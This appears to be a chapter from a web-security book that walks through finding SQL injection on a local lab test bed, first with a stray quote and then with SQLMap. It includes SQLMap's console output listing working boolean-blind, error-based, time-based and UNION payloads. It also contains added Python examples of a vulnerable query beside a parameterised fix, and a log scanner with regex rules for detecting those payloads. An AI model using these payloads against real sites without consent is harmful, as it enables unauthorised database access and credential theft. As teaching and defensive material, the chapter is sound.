In this chapter, we will detect and identify whether the tested site is vulnerable. If it is, we will exploit it with SQLMap.
Let me first demonstrate the first test bed.
Click on GET Error-based Single-quoter-String to open our first test bed site.
Supply the ID as a parameter with a numeric value, as shown in the screenshot below:
It takes a GET parameter named id and displays the username and password values for that ID:
This URL displayed the values for the first user.
Similarly, if we increment the id parameter, we'll notice different usernames and their corresponding password pairs.
The most benign check for SQL injection is simply adding a single quotation mark ( ' ) after the suspect parameter. This tries to break the application's SQL query by introducing a stray string delimiter.
Now let's try that out:
As expected, we get a classic MariaDB error, which tells us that something is odd and that the parameter is possibly susceptible to error-based SQL injection.
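To see why the stray quote produces that error, here is an added example (not code from the lab application or from this book) that rebuilds the lookup in Python on an in-memory SQLite table standing in for MariaDB, with the string-concatenated query beside a parameterised, allow-listed one. The table rows, passwords and function names are constructed for this example.

```python
import sqlite3


def make_demo_db():
    """In-memory stand-in for the lab's users table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-alice"), (2, "bob", "pw-bob"), (4, "dave", "pw-dave")])
    return conn


def lookup_user_unsafe(conn, id_value):
    """Mirrors the test bed: the raw GET value is pasted into the query text."""
    query = f"SELECT username, password FROM users WHERE id='{id_value}' LIMIT 1"
    try:
        return {"query": query, "row": conn.execute(query).fetchone(), "error": None}
    except sqlite3.Error as exc:  # SQLite's analogue of the MariaDB syntax error seen above
        return {"query": query, "row": None, "error": str(exc)}


def lookup_user_safe(conn, id_value):
    """Hardened form: allow-list the value, then bind it so it is never parsed as SQL."""
    if not str(id_value).isdigit():  # id must be a plain integer; anything else is rejected
        return {"query": None, "row": None, "error": "rejected: non-numeric id"}
    query = "SELECT username, password FROM users WHERE id=? LIMIT 1"
    return {"query": query, "row": conn.execute(query, (int(id_value),)).fetchone(), "error": None}


if __name__ == "__main__":
    db = make_demo_db()
    for probe in ("1", "1'", "1' AND 1=1 AND 'a'='a"):
        print(repr(probe), "unsafe ->", lookup_user_unsafe(db, probe))
        print(repr(probe), "safe   ->", lookup_user_safe(db, probe))
```

The unsafe version errors on the bare quote and still returns a row for the tautology payload; the safe version returns nothing for both because the value never reaches the parser as SQL.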
Let's fire up SQLMap and try to figure out whether it is exploitable or not.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:32:01 /2022-12-06/
[12:32:02] [INFO] testing connection to the target URL
[12:32:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:32:03] [INFO] testing if the target URL content is stable
[12:32:03] [INFO] target URL content is stable
[12:32:03] [INFO] testing if GET parameter 'id' is dynamic
[12:32:03] [INFO] GET parameter 'id' appears to be dynamic
[12:32:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:32:03] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:32:03] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
SQLMap throws an excellent output suggesting that the id parameter is vulnerable to an error-based SQL injection and that the backend database is MySQL.
[12:32:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
As you may have understood, -u is used to supply the URL to SQLMap, and the GET parameter is selected from it. If there are multiple parameters to look into, we can use -p followed by the parameter name to tell SQLMap explicitly which parameter to test.
As a bonus, it also alerts us that the parameter appears to be susceptible to XSS as well.
[12:32:03] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
If you suspect that your backend database is not MySQL, then type y to continue. It is good practice to check it.
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
On completion, it reports that the id parameter of the tested URL is vulnerable and asks whether to keep testing the other parameters. Type y to continue if there are any.
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4' AND 5978=5978 AND 'yBkh'='yBkh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=4' AND (SELECT 7029 FROM(SELECT COUNT(*),CONCAT(0x71766b7871,(SELECT (ELT(7029=7029,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pqQq'='pqQq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=4' AND (SELECT 2736 FROM (SELECT(SLEEP(5)))haHG) AND 'MBbF'='MBbF
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6733' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b7871,0x6e7a796f655346646f704c4c6167654b6c666177674254694d6456497a5851767371434e5467736a,0x71716a6a71)-- -
---
[12:32:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:32:39] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'
[*] ending @ 12:32:39 /2022-12-06/
When the detection phase is over, the output also shows us the variety of ways in which we can exploit this flaw. The detailed output lists the exploitation choices, the payload used for each test, and the backend architecture of the web application.
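From the defender's side, the payload classes listed above are exactly what the web server's access log records. The following added example (not part of this book or of sqlmap) URL-decodes the id parameter from constructed Apache combined-format log lines and flags the probe patterns; the regexes, client IP, path and user-agent string are constructed assumptions for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Probe signatures derived from the payload classes sqlmap reported above
# (constructed regexes for this example, not sqlmap's or any WAF's rule set).
RULES = {
    "quote-break":   re.compile(r"'"),
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "time-blind":    re.compile(r"\bSLEEP\s*\(", re.I),
    "union-query":   re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "error-based":   re.compile(r"FLOOR\s*\(\s*RAND|INFORMATION_SCHEMA", re.I),
}
# Apache combined log format; the user agent is the last quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Constructed sample lines: one benign request, the manual quote test, then three
# sqlmap probes shaped like the payloads above (client IP, path and version are placeholders).
SAMPLE_LOG = [
    '192.168.56.1 - - [06/Dec/2022:12:31:40 +0000] "GET /app/?id=1 HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [06/Dec/2022:12:31:55 +0000] "GET /app/?id=1%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [06/Dec/2022:12:32:05 +0000] "GET /app/?id=4%27%20AND%205978%3D5978%20AND%20%27yBkh%27%3D%27yBkh HTTP/1.1" 200 734 "-" "sqlmap/1.x#stable (https://sqlmap.org)"',
    '192.168.56.1 - - [06/Dec/2022:12:32:20 +0000] "GET /app/?id=4%27%20AND%20(SELECT%202736%20FROM%20(SELECT(SLEEP(5)))haHG)%20AND%20%27MBbF%27%3D%27MBbF HTTP/1.1" 200 734 "-" "sqlmap/1.x#stable (https://sqlmap.org)"',
    '192.168.56.1 - - [06/Dec/2022:12:32:30 +0000] "GET /app/?id=-6733%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71766b7871,0x41,0x71716a6a71)--%20- HTTP/1.1" 200 900 "-" "sqlmap/1.x#stable (https://sqlmap.org)"',
]

def scan_line(line):
    """Return (ip, parameter, rule) findings for one log line; [] when benign."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    if "sqlmap" in m.group("ua").lower():  # default UA; trivially changed, so a weak signal
        findings.append((m.group("ip"), "-", "sqlmap-ua"))
    # parse_qsl URL-decodes each value, so the regexes see the payload as the DBMS would
    for name, value in parse_qsl(urlsplit(m.group("path")).query, keep_blank_values=True):
        for rule, rx in RULES.items():
            if rx.search(value):
                findings.append((m.group("ip"), name, rule))
    return findings

def rule_counts(lines):
    """Aggregate findings per rule over a whole log."""
    return Counter(f[2] for line in lines for f in scan_line(line))

if __name__ == "__main__":
    for rule, n in sorted(rule_counts(SAMPLE_LOG).items()):
        print(f"{rule:14s} {n}")
```

The user-agent match is the weakest signal, since sqlmap's --random-agent option replaces it; the decoded payload patterns survive that change.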
Now it is obvious that we can exploit this using the error-based technique. But before that, I'll walk you through the different settings we can use.
SQLMap lets you force a specific exploitation technique with the --technique command line switch.
Letter   Technique
B        Boolean-based blind or simply blind injection
E        Error-based injection
U        UNION-query based injection
S        Stacked queries
T        Time-based injection
Q        Inline queries
By default, SQLMap selects the appropriate usable technique, but it is a good idea to manually force SQLMap into one of these options if there are anomalies or if SQLMap is unable to dump the data automatically.
If you want to manually force SQLMap into one of these options, you have to specify it while running the command.